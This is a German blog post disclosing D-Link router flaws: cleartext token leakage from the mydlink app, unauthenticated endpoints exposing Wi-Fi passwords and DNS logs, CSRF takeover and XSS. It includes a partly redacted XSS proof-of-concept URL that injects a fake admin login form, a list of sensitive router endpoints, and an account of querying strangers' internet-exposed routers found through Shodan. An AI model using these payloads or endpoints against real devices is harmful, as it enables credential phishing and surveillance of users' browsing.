Mit ‘DLink’ getaggte Beiträge

„◾Sicher ist, dass nichts sicher ist. Selbst das nicht.“ – Joachim Ringelnatz

Nur ein kurzer Blogeintrag, denn ich habe momentan nicht die Zeit, die nötig wäre, um tiefer in das Thema zu schauen!

 

[***Update 4 – 14.07.2014***]

Wie mir soeben aufgefallen ist, scheint eine alte CSRF-Lücke auf dem DIR865, mit der man den Router komplett übernehmen kann, noch zu existieren (zumindest auf dem DIR868L). So war es nicht nur möglich an meinem Gerät das Adminpasswort zu ändern, sondern auch den Fernzugriff auf das Gerät auf einem frei definierbaren Port zu aktivieren. Vorerst dazu keine näheren
Details.

Phishing

Vuln-Devices (incomplete list):

868L

Ver 1.04 – yes

Ver 1.02 – yes

Ver 1.07 – yes

Ver 1.06 – yes

Ver 1.01 – yes

Ver 1.0 – not tested

860L

Ver 1.01 – yes

Ver 1.08 – yes

Ver 1.00 – yes

Ver 1.04 – yes

Ver 1.07 – yes

Ver 1.05 – yes

Ver 1.03 – yes

Ver 1.02 – yes

[***Update 3 – 04.07.2014***]

Es sind (offenbar mehrere) D-Link Router von mehreren XSS-Lücken betroffen, bei denen ein entsprechend manipulierter Link beliebigen HTML/JavaScript-Code ausführen kann. Ich habe die Lücken aktuell auf 2 Modellen (DIR-868L und DIR-865L / aktuelle Firmware) finden können (mehr Geräte/FW-Versionen wurden von mir bislang nicht getestet). D-Link ist auch hierzu informiert.
Ich bitte davon Abstand zu nehmen nach der genauen Reproduzierbarkeit der Lücke zu fragen, bis D-Link darauf entsprechend mit einem Fix/Patch reagieren konnte.

[***Update 2***]

Vollständige PoC-URL erst dann, wenn D-Link das OK gibt. D’Link ist seit Freitag informiert und kann somit reagieren. Auch hinsichtlich meiner Erfahrungen mit der MyDLink-App! Zu weiteren CSRF oder XSA Szenarien kann ich momentan nichts sagen.
Bei D-Link nimmt man sich der Sache aber offenbar bereits an. Das ist leider nicht bei allen Unternehmen so vorbildlich der Fall, wie mein Blog aufzeigt…

XSS PoC (getestet mit DIR-868L FW 1.07) – wer es mit seinem D’Link testen möchte, bitte IP anpassen:

http://192.168.0.1/***REDACTED***/**REDACTED**.php?username=admin&password=%3C/script%3E%3Chtml%3E%3Chead%3E%3Ctitle%3E%3C/title%3E%3C/head%3E%3Cbody%3E%3Cimg%20src=%22/pic/dlink_utility.jpg%22%3E%3Cform%20name=%22Login%22%3E%3Cp%3EAdmin%20Password:%20%3Cinput%20name=%22Admin-Passwort:%22%20size=%2210%22%20type=%22text%22%20/%3E%3C/p%3E%3Cp%3E%3Cinput%20name=%22Login%22%20type=%22button%22%20value=%22Log%20me%20in%22%20/%3E%3C/p%3E%3C/form%3E%3Cp%3EWoooops%20take%20care%20you,%20might%20get%20fooled?%20;-P%3C/p%3E%3C/body%3E%3C/html%3E%3C!–


[***Update 1***]
Je mehr ich mir das anschaue um so interessanter wird es. Und jetzt kommt noch eine fette XSS-Lücke hinzu.

http://192.168.0.1/**redacted**>

DLinkXSS

Ein kurzer Test, was die myDLink-App von DLink denn so in meinem Netzwerk an Informationen sendet, führte soeben zu einigem Entsetzen meinerseits!

Mein Sniffer spuckte mir heute in meinem Netzwerk einige interessante URL aus, die mittels unsicherem http via GET rausgefeuert wurden und somit theoretisch von jedem User innerhalb meines LAN hätten abgefangen werden können. So wurden beim Aufruf von der mydlink-App neben dem Access-Token folgende URL sichtbar (unvollständige Liste):

http://192.168.0.1/mydlink/get_LogDnsQuery.asp //ganz böse Falle, wenn Router über Internet direkt erreichbar!

http://192.168.0.1/mydlink/get_Wireless_5g.asp?displaypass=1

http://192.168.0.1/mydlink/get_WlanAcl.asp

http://192.168.0.1/mydlink/get_TriggedEventHistory.asp

http://192.168.0.1/mydlink/get_Network.asp

http://192.168.0.1/mydlink/get_Email.asp?displaypass=1

http://192.168.0.1/goform/form_login

http://192.168.0.1/common/info.cgi

Update der Linkliste (was davon kritisch sein könnte, hängt auch davon ab ob man eingeloggt ist und ggf. ein CSRF greift ^^):

http://192.168.0.1/mydlink/form_logout

http://192.168.0.1/mydlink/get_Wireless.php

http://192.168.0.1/HNAP1/

http://192.168.0.1/parentalcontrols/bind.php

http://192.168.0.1/log_get.php

http://192.168.0.1/portal/explorer.php

http://192.168.0.1/portal/comm/drag.php

http://192.168.0.1/webaccess/music.php

http://192.168.0.1/webaccess/doc.php

http://192.168.0.1/webaccess/folder_view.php

http://192.168.0.1/webaccess/logininfo.xml

http://192.168.0.1/webaccess/category_view.php

Eine kurze Suche bei Shodanhq nach dem Model 868l förderte einige Geräte zum Vorschein die über das Internet erreichbar sind. Testweise mal /common/info.cgi angehängt und voila da haben wir schon ein paar nette Informationen zu dem Gerät.

DLink1

Damit lässt sich zwar noch nicht all zu viel anfangen, aber ich denke der Ansatz ist jedem klar.
Die richtige MAC ist schon mal für einen Angriff auf das WLAN nicht zu verachten.

Richtig fatal wird es aber wenn man sich mal ansieht was einem http://xxx.xxx.xxx.xxx:8080/mydlink/get_LogDnsQuery.asp
bei manchen frei übers Internet aufrufbaren Geräten so ausspuckt! Hier musste ich den Screenshot leider drastisch zensieren, da u.a. zu ersehen war welche Bank und *hüstel hüstel* nicht ganz jugendfreien Seiten dieser User auf dem Gerät aufgerufen hat.

DLink2

Ich behaupte an dieser Stelle mal, dass die wenigsten der Admin/Anwender solcher Geräte wissen, dass sie damit quasi ein Real-Time-Tracking ermöglichen! Dem DNS-Query sei Dank….

Wer die nötige Zeit hat darf mir gerne in den Kommentaren seine Entdeckungen hierzu mitteilen. Ich bin gespannt!
Sollte eine Reaktion seitens DLink erfolgen, werde ich hier updaten.

Advertisements